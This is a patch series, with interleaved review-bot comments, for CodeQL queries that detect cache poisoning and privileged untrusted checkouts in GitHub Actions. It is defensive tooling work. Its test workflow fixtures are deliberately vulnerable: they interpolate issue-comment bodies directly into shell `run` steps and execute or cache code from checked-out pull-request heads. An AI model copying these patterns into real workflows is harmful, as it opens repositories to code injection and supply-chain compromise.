a/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml new file mode 100644 index 000000000000..3b646b795ac2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml 
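Review bot: The alert message in the new `CachePoisoningByCodeInjection.ql` select, `"Potential code injection in $@, which may be controlled by an external user."`, is the generic code-injection text and says nothing about the cache-poisoning impact that distinguishes this query (`@id actions/cache-poisoning/code-injection`, `@security-severity 9.3`); something like `"Potential cache poisoning of the default branch via code injection in $@, which may be controlled by an external user."` tells the reader what the rating is for. The default-branch trigger condition — `hasTriggerEvent(defaultBranchTriggerEvent())` plus the `workflow_call` caller lookup and its three TODO comments — is a verbatim copy of the block in `CachePoisoning.ql`; factoring it into a predicate in `CachePoisoningQuery.qll` (for example `predicate runsOnDefaultBranch(LocalJob j)`) would keep the two queries from drifting when the TODOs are resolved. The `@description` should also state that no cache-writing step is required in the job, since test9.yml has none and is expected to alert.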
@@ -0,0 +1,12 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + runs-on: ubuntu-latest + permissions: {} + steps: + - run: | + echo ${{ github.event.comment.body }} + diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 6e0030ad3832..67cdea32c5d1 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,5 +1,6 @@ -| .github/workflows/test1.yml:17:9:21:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test2.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test3.yml:12:9:20:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test6.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test7.yml:12:9:15:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test1.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test2.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test3.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test6.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test7.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test8.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected new file mode 100644 index 000000000000..5f244aa2faf8 --- /dev/null 
+++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref new file mode 100644 index 000000000000..cd1a90049a64 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoningByCodeInjection.ql + From 409a6aa1373db2063058cdc14a59c3d3887895ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 18:48:16 +0200 Subject: [PATCH 250/707] Update ql/src/Security/CWE-349/CachePoisoning.ql MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Jaroslav LobaÄevski --- ql/src/Security/CWE-349/CachePoisoning.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index bf18df4797dc..a1436fd6fe37 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -43,4 +43,4 @@ where // (The cache specific token can be leaked even for non-privileged workflows) checkout.getAFollowingStep() instanceof PoisonableStep ) -select checkout, "Potential cache poisoning on privileged workflow." +select checkout, "Potential cache poisoning of a default branch." 
From e8f2bc3ef69f2a7171c7442a06ffc13b920d06ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:32:11 +0200 Subject: [PATCH 251/707] Remove debug method
---
ql/lib/codeql/actions/controlflow/internal/Cfg.qll | 2 -- 1 file changed, 2 deletions(-)
diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
index 0db8d63e6f3b..ba6430f157fc 100644
--- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
+++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
@@ -295,5 +295,3 @@ private class InputTree extends LeafTree instanceof Input { }
 private class ScalarValueLeaf extends LeafTree instanceof ScalarValue { }
 private class ExpressionLeaf extends LeafTree instanceof Expression { }
-
-predicate test(ScalarValueLeaf f) { any() }
From ddf72a2cf3c03fc38210a21a48694cf9142c826c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:32:24 +0200 Subject: [PATCH 252/707] Add more poisonable steps
---
ql/lib/codeql/actions/security/PoisonableSteps.qll | 7 +++++++ 1 file changed, 7 insertions(+)
diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll
index 130879a7cb6a..f65bf5fb4dc8 100644
--- a/ql/lib/codeql/actions/security/PoisonableSteps.qll
+++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll
@@ -43,12 +43,19 @@ class LocalCommandExecutionRunStep extends PoisonableStep, Run {
 or
 // sh xxxx
 cmd = line.regexpCapture("(^|\\s+)(ba|z|fi)?sh\\s+(.*)", 3)
+ or
+ // node xxxx
+ cmd = line.regexpCapture("(^|\\s+)(node|python|ruby|go)\\s+(.*)", 3)
 )
 }
 string getCommand() { result = cmd }
 }
+class LocalActionUsesStep extends PoisonableStep, UsesStep {
+ LocalActionUsesStep() { this.getCallee().matches("./%") }
+}
+
 class EnvVarInjectionRunStep extends PoisonableStep, Run {
 EnvVarInjectionRunStep() {
 exists(string value |
From f95a3e5298633558718b462d195a4308df1e1cd1 Mon Sep 17 00:00:00 2001
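Review bot: The comment `// node xxxx` above the new `regexpCapture` in `LocalCommandExecutionRunStep` names only one of the four interpreters the pattern covers; `// node|python|ruby|go xxxx` keeps it in step with the `// sh xxxx` line above it. The pattern `(^|\\s+)(node|python|ruby|go)\\s+(.*)` also requires whitespace directly after the interpreter name, so a versioned invocation such as `python3 script.py` is not captured as a poisonable step; if that is unintended, `python[0-9.]*` in the alternation closes the gap. The new `LocalActionUsesStep` has no QLDoc; suggested: `/** A uses-step that references a local action from the checked-out repository (a ./ path). */`. `LocalCommandExecutionRunStep` begins before the hunk and `EnvVarInjectionRunStep` continues past it.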
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:33:06 +0200 Subject: [PATCH 253/707] Refactor eventtrigger and privileged methods Move them from Workflows to Jobs --- ql/lib/codeql/actions/Ast.qll | 7 +- ql/lib/codeql/actions/ast/internal/Ast.qll | 173 ++++++++++++------ .../PrivilegedUntrustedCheckoutCritical.ql | 7 +- .../PrivilegedUntrustedCheckoutHigh.ql | 7 +- 4 files changed, 125 insertions(+), 69 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index bfbc990d6712..7d10f29af507 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -261,8 +261,6 @@ class Workflow extends AstNode instanceof WorkflowImpl { Permissions getPermissions() { result = super.getPermissions() } Strategy getStrategy() { result = super.getStrategy() } - - predicate isPrivileged() { super.isPrivileged() } } class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { @@ -288,6 +286,7 @@ class Outputs extends AstNode instanceof OutputsImpl { } class Permissions extends AstNode instanceof PermissionsImpl { + bindingset[perm] string getPermission(string perm) { result = super.getPermission(perm) } string getAPermission() { result = super.getAPermission() } @@ -329,6 +328,10 @@ abstract class Job extends AstNode instanceof JobImpl { Permissions getPermissions() { result = super.getPermissions() } + predicate hasTriggerEvent(string trigger) { super.hasTriggerEvent(trigger) } + + string getATriggerEvent() { result = super.getATriggerEvent() } + Strategy getStrategy() { result = super.getStrategy() } predicate isPrivileged() { super.isPrivileged() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 0cbb8ab10ed9..e9989bf6e932 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
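Review bot: The new `Job.hasTriggerEvent` and `Job.getATriggerEvent` wrappers in `Ast.qll` have no QLDoc, and the `JobImpl` implementation they delegate to (in the `internal/Ast.qll` hunk at the end of this excerpt, which is cut off) looks up `n.lookup("on")` on the job's own mapping — the node bound by `TJobNode`, which this same series uses for `n.lookup("strategy")` — whereas `on` is a key of the workflow mapping; it looks like a copy of the `WorkflowImpl` version that still needs to go through the enclosing workflow, so a test that exercises a job-level `isPrivileged()` via its trigger would be worth adding. Suggested docs: `/** Holds if the workflow enclosing this job is triggered by the given event. */` and `/** Gets an event that triggers the workflow enclosing this job. */`. Removing `Workflow.isPrivileged()` from the public API will break any query outside this diffstat that still calls it; a deprecated stub delegating to the job-level check would soften that.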
@@ -64,7 +64,7 @@ private newtype TAstNode = TInputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("inputs") = n) } or TInputNode(YamlValue n) { exists(YamlMapping m | m.lookup("inputs").(YamlMapping).maps(n, _)) } or TOutputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("outputs") = n) } or - TPermissionsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("permissions") = n) } or + TPermissionsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("permissions") = n) } or TStrategyNode(YamlMapping n) { exists(YamlMapping m | m.lookup("strategy") = n) } or TNeedsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("needs") = n) } or TJobNode(YamlMapping n) { exists(YamlMapping w | w.lookup("jobs").(YamlMapping).lookup(_) = n) } or @@ -320,6 +320,9 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { /** Gets a job within this workflow */ JobImpl getAJob() { result = this.getJob(_) } + /** Gets the permissions granted to this workflow. */ + PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } + /** Workflow is triggered by given trigger event */ predicate hasTriggerEvent(string trigger) { exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger)) 
@@ -330,43 +333,8 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(result)) } - /** Gets the permissions granted to this workflow. */ - PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } - - private predicate hasSingleTrigger(string trigger) { - this.getATriggerEvent() = trigger and - count(this.getATriggerEvent()) = 1 - } - /** Gets the strategy for this workflow. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } - - /** Holds if the workflow is privileged. */ - predicate isPrivileged() { - // The Workflow has a permission to write to some scope - this.getPermissions().getAPermission() = "write" - or - // The Workflow accesses a secret - exists(SecretsExpressionImpl expr | - expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" - ) - or - // The Workflow is triggered by an event other than `pull_request` - count(this.getATriggerEvent()) = 1 and - not this.getATriggerEvent() = ["pull_request", "workflow_call"] - or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - this.hasSingleTrigger("workflow_call") and - exists(ExternalJobImpl call, WorkflowImpl caller | - call.getCallee() = this.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - caller.isPrivileged() - ) - or - // The Workflow has multiple triggers so at least one is not "pull_request" - count(this.getATriggerEvent()) > 1 - } } class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { @@ -502,7 +470,7 @@ class OutputsImpl extends AstNodeImpl, TOutputsNode { } class PermissionsImpl extends AstNodeImpl, TPermissionsNode { - YamlMapping n; + YamlMappingLikeNode n; PermissionsImpl() { this = TPermissionsNode(n) } 
@@ -516,11 +484,41 @@ class PermissionsImpl extends AstNodeImpl, TPermissionsNode { override Location getLocation() { result = n.getLocation() } - override YamlMapping getNode() { result = n } + override YamlMappingLikeNode getNode() { result = n } + + string getAScope() { + result = + [ + "actions", "attestations", "checks", "contents", "deployments", "discussions", "id-token", + "issues", "packages", "pages", "pull-requests", "repository-projects", "security-events", + "statuses" + ] + } - string getPermission(string perm) { result = n.lookup(perm).(YamlScalar).getValue() } + string getAPermission() { + exists(YamlMapping mapping, string scope | + mapping = n and + result = scope + ": " + mapping.lookup(scope).(YamlScalar).getValue() + ) + or + exists(YamlScalar scalar | + scalar = n and + ( + scalar.getValue() = "write-all" and + result = this.getAScope() + ":write" + or + scalar.getValue() = "read-all" and + result = this.getAScope() + ":read" + ) + ) + } - string getAPermission() { result = this.getPermission(_) } + bindingset[perm] + string getPermission(string perm) { + exists(string p | + p = this.getAPermission() and p.matches(perm + ":%") and result = p.splitAt(":", 1).trim() + ) + } } class StrategyImpl extends AstNodeImpl, TStrategyNode { 
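Review bot: `getAPermission()` now returns two different string shapes: the mapping branch builds `scope + ": " + value` (colon and space) while the `read-all`/`write-all` branch builds `this.getAScope() + ":write"` (no space), so a caller comparing against `"contents:write"` only ever sees the scalar form, and `getPermission()` has to `trim()` to paper over the difference. Use `result = scope + ":" + mapping.lookup(scope).(YamlScalar).getValue()` so both branches agree, after which the `.trim()` in `getPermission` is redundant. `getAScope()` and the reworked `getAPermission()` also lack QLDoc; the latter should state the `scope:level` format it yields, since the `JobImpl` consumers in this series pattern-match on it with `matches("%write")`.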
@@ -633,37 +631,87 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the strategy for this job. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } - /** Holds if the workflow is privileged. */ + /** Holds if the job is privileged. */ predicate isPrivileged() { + // the job has privileged runtime permissions + this.hasRuntimeWritePermissions() + or + // the job has an explicit secret accesses + this.hasExplicitSecretAccess() + or // the job has an explicit write permission - this.getPermissions().getAPermission() = "write" + this.hasExplicitWritePermission() + or + // the job has no explicit permissions but the workflow has write permissions + not exists(this.getPermissions()) and + this.hasImplicitWritePermission() or + // neither the job nor the workflow have permissions but the job has a privileged trigger + not exists(this.getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions()) and + this.hasPrivilegedTrigger() + } + + private predicate hasExplicitSecretAccess() { // the job accesses a secret other than GITHUB_TOKEN exists(SecretsExpressionImpl expr | expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" ) - or - // the effective permissions have write access + } + + private predicate hasExplicitWritePermission() { + // the job has an explicit write permission + this.getPermissions().getAPermission().matches("%write") + } + + private predicate hasImplicitWritePermission() { + // the job has an explicit write permission + this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + } + + private predicate hasRuntimeWritePermissions() { + // the effective runtime permissions have write access exists(string path, string trigger, string name, string secrets_source, string perms | workflowDataModel(path, trigger, name, secrets_source, perms, _) and path.trim() = this.getLocation().getFile().getRelativePath() and name.trim().matches(this.getId() + "%") and // We cannot 
trust the permissions for pull_request events since they depend on the - // location of the head branch + // provenance of the head branch (local vs fork) not trigger.trim() = "pull_request" and - ( - secrets_source.trim().toLowerCase() = "actions" or - perms.toLowerCase().matches("%write%") - ) + perms.toLowerCase().matches("%write%") ) + } + + private predicate hasPrivilegedTrigger() { + // For workflows that are triggered by the pull_request_target event, the GITHUB_TOKEN is granted read/write repository permission unless the permissions key is specified and the workflow can access secrets, even when it is triggered from a fork. + // The Job is triggered by an event other than `pull_request` + count(this.getATriggerEvent()) = 1 and + not this.getATriggerEvent() = ["pull_request", "workflow_call"] or - // The job has no expliclit permission, but the enclosing workflow is privileged - not exists(this.getPermissions()) and - not exists(SecretsExpressionImpl expr | - expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" - ) and - // The enclosing workflow is privileged - this.getEnclosingWorkflow().isPrivileged() + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + this.hasSingleTrigger("workflow_call") and + exists(ExternalJobImpl call, JobImpl caller | + call.getCallee() = this.getLocation().getFile().getRelativePath() and + caller = call.getEnclosingJob() and + caller.isPrivileged() + ) + or + // The Workflow has multiple triggers so at least one is not "pull_request" + count(this.getATriggerEvent()) > 1 + } + + /** Workflow is triggered by given trigger event */ + predicate hasTriggerEvent(string trigger) { + exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger)) + } + + /** Gets the trigger event that starts this workflow. 
*/ + string getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } + + private predicate hasSingleTrigger(string trigger) { + this.getATriggerEvent() = trigger and + count(this.getATriggerEvent()) = 1 } /** Gets the runs-on field of the job. */ @@ -825,11 +873,14 @@ class UsesStepImpl extends StepImpl, UsesImpl { /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ override string getCallee() { - result = - ( - u.getValue().regexpCapture(usesParser(), 1) + "/" + - u.getValue().regexpCapture(usesParser(), 2) - ).toLowerCase() + if u.getValue().matches("./%") + then result = u.getValue() + else + result = + ( + u.getValue().regexpCapture(usesParser(), 1) + "/" + + u.getValue().regexpCapture(usesParser(), 2) + ).toLowerCase() } /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ diff --git a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql index 5c0528c45518..1181cd1e7559 100644 --- a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql @@ -17,10 +17,11 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from Workflow w, PRHeadCheckoutStep checkout +from LocalJob j, PRHeadCheckoutStep checkout where - w.isPrivileged() and - w.getAJob().(LocalJob).getAStep() = checkout and + j = checkout.getEnclosingJob() and + j.isPrivileged() and + j.getAStep() = checkout and checkout.getAFollowingStep() instanceof PoisonableStep and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check diff --git a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql index e45075552ab2..bf2cf129fbf5 100644 
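Review bot: `hasTriggerEvent` on JobImpl does `n.lookup("on")` on the job's own node, but a job mapping has no `on` key (that is a workflow-level key), so the predicate can never hold, and its doc comment still says "Workflow is triggered by given trigger event". Since `getATriggerEvent` already delegates to the enclosing workflow, do the same here: `predicate hasTriggerEvent(string trigger) { this.getATriggerEvent() = trigger }`. Two comments are copy-paste leftovers: `hasImplicitWritePermission` is annotated "the job has an explicit write permission" but tests the enclosing workflow, so it should read `// the enclosing workflow grants a write permission that this job inherits`, and the long pull_request_target sentence at the top of `hasPrivilegedTrigger` describes GITHUB_TOKEN defaults but sits on the generic "event other than pull_request" disjunct, where it reads as the justification for that disjunct. JobImpl continues outside the hunk on both sides.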
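Review bot: The new `./%` branch of `getCallee()` returns the raw local path (leading `./` and original case kept) while the remote branch is lower-cased, so the predicate now has two result shapes that the doc comment directly above ("owner and name of the repository, e.g. actions/checkout") does not mention; callers matching callees against repository-relative paths will have to strip the prefix themselves. Either normalise here or extend the doc, e.g. `/** ... For local actions (uses: ./path) the path is returned unchanged, including the leading "./". */`. `docker://` references still fall through to `usesParser()`, which presumably yields no result for them; if that is intended, a one-line comment saying so stops the next reader treating it as a bug.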
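Review bot: With `j = checkout.getEnclosingJob()` already binding `j`, the extra conjunct `j.getAStep() = checkout` is redundant if `getEnclosingJob` is the inverse of `getAStep` (not visible here); if it is there to exclude steps nested inside composite actions, a comment should say so, otherwise drop the line. The same pattern is repeated in the PrivilegedUntrustedCheckoutHigh.ql hunk at `@@ -17,10 +17,11 @@`. Privilege is now evaluated per job, but the alert text recorded in the `.expected` files ("... on privileged workflow.") is unchanged; the `select` (outside the hunk) should say "privileged job" so the alert states what the query actually checks.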
--- a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql @@ -17,10 +17,11 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from Workflow w, PRHeadCheckoutStep checkout +from LocalJob j, PRHeadCheckoutStep checkout where - w.isPrivileged() and - w.getAJob().(LocalJob).getAStep() = checkout and + j = checkout.getEnclosingJob() and + j.isPrivileged() and + j.getAStep() = checkout and not checkout.getAFollowingStep() instanceof PoisonableStep and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check From 2d09d1e6d88d0fa9198f3274505d02567acb5f45 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:34:30 +0200 Subject: [PATCH 254/707] Fix alert text --- ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 2de07ec17bd1..e02b64e9ec5a 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -37,5 +37,5 @@ where ) ) select sink.getNode(), source, sink, - "Potential code injection in $@, which may be controlled by an external user.", sink, + "Unprivileged code injection in $@, which may lead to cache poisoning.", sink, sink.getNode().asExpr().(Expression).getRawExpression() From 44377acb0811775441b855ed214132ff6d283813 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:35:06 +0200 Subject: [PATCH 255/707] Improve Cache Poisoning quer --- ql/src/Security/CWE-349/CachePoisoning.ql | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) 
diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index bf18df4797dc..12be71af43ee 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -16,8 +16,10 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps -from LocalJob j, PRHeadCheckoutStep checkout +from LocalJob j, PRHeadCheckoutStep checkout, Step s where + // Excluding privileged workflows since they can be easily exploited in similar circumstances + not j.isPrivileged() and // The workflow runs in the context of the default branch // TODO: (require to collect trigger types) // - add push to default branch? @@ -37,10 +39,13 @@ where ( // The job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) - j.getAStep() instanceof CacheWritingStep + j.getAStep() = s and + s instanceof CacheWritingStep or // The job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) - checkout.getAFollowingStep() instanceof PoisonableStep + checkout.getAFollowingStep() = s and + s instanceof PoisonableStep ) -select checkout, "Potential cache poisoning on privileged workflow." +select checkout, "Untrusted checked-out code may lead to cache poisoning on step $@.", s, + s.toString() From d2e9411e129380691ebacb645a1fbd74bea3c572 Mon Sep 17 00:00:00 2001 
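Review bot: The comment on the new `not j.isPrivileged()` conjunct, "since they can be easily exploited in similar circumstances", explains why privileged jobs are dangerous, not why they are excluded here; they are excluded because the PrivilegedUntrustedCheckout queries already report them, so say that: `// Privileged jobs are reported by the PrivilegedUntrustedCheckout queries; this query covers the unprivileged case`. In the second hunk at `@@ -37,10 +39,13 @@` the `CacheWritingStep` disjunct (`j.getAStep() = s`) accepts a cache write anywhere in the job, including before the checkout; the existing comment argues ordering is irrelevant because saving happens when the job completes, which holds for a post-step but not necessarily for a save-only cache step, so it is worth recording as a known approximation. The message selected here ("Untrusted checked-out code may lead to cache poisoning...") is what PATCH 256's baseline records, yet PATCH 258 rewrites the baseline to "Potential cache poisoning in the context of the default branch..."; no query change producing that text is visible in this series, so either a commit is missing or baseline and query disagree.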
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:35:17 +0200 Subject: [PATCH 256/707] Update and new tests --- .../CWE-349/.github/workflows/test1.yml | 1 + .../CWE-349/.github/workflows/test10.yml | 12 +++++++++ .../CWE-349/.github/workflows/test11.yml | 24 +++++++++++++++++ .../CWE-349/.github/workflows/test12.yml | 21 +++++++++++++++ .../CWE-349/.github/workflows/test2.yml | 2 ++ .../CWE-349/.github/workflows/test3.yml | 2 ++ .../CWE-349/.github/workflows/test4.yml | 4 +++ .../CWE-349/.github/workflows/test5.yml | 2 ++ .../CWE-349/.github/workflows/test6.yml | 1 + .../CWE-349/.github/workflows/test7.yml | 1 + .../CWE-349/.github/workflows/test8.yml | 26 ++++++++++++++++--- .../CWE-349/.github/workflows/test9.yml | 2 +- .../Security/CWE-349/CachePoisoning.expected | 14 +++++----- .../CachePoisoningByCodeInjection.expected | 3 ++- ...ivilegedUntrustedCheckoutCritical.expected | 1 + .../PrivilegedUntrustedCheckoutHigh.expected | 1 - 16 files changed, 104 insertions(+), 13 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml index 75e03886d48e..55efe8e9fec9 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml @@ -4,6 +4,7 @@ on: jobs: pr-comment: + permissions: read-all runs-on: ubuntu-latest steps: - uses: xt0rted/pull-request-comment-branch@v2 diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml new file mode 100644 index 000000000000..eba5e79229b4 --- /dev/null 
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml @@ -0,0 +1,12 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: write-all + runs-on: ubuntu-latest + steps: + - run: | + echo ${{ github.event.comment.body }} + diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml new file mode 100644 index 000000000000..3849d92cbcca --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml @@ -0,0 +1,24 @@ +on: + issue_comment: + types: [created] + +permissions: write-all + +jobs: + pr-comment: + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml new file mode 100644 index 000000000000..e2c435af62de --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml @@ -0,0 +1,21 @@ +on: + issue_comment: + types: [created] + +permissions: + issues: write +jobs: + pr-comment: + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - run: | + ./checkedout/poison + diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml index 6a6595d929ee..eb6373a406eb 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml 
